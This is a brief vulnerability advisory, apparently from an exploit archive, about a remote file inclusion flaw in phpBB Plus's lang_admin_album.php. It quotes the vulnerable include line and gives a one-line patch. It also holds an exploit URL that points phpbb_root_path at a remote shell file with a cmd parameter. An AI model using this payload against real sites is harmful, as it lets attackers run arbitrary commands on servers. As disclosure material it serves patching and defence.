phpBB Plus suffers from a remote file inclusion vulnerability in lang_admin_album.php.
3db115fede6f2e754b24773d279e3a245c98df46983db5e5425fd1bff288efa7
AUTHOR :
Rbt-4 Crew
Contact:
info@rbt-4.net
Found Rfi in
language/lang_german/lang_admin_album.php
language/lang_english/lang_admin_album.php
Vulnerability info:
Line: 25
Code: include($phpbb_root_path.\'language/lang_german/lang_hierarchy_album.\' . $phpEx);
Exploit example:
http://[PhpBBPlus]/language/lang_english/lang_admin_album.php?phpbb_root_path=[shell.txt]?cmd=
Fix rfi:
Line: 24
Code: if(!defined(\'IN_PHPBB\')) die(\"Fixed...Sorry =)\");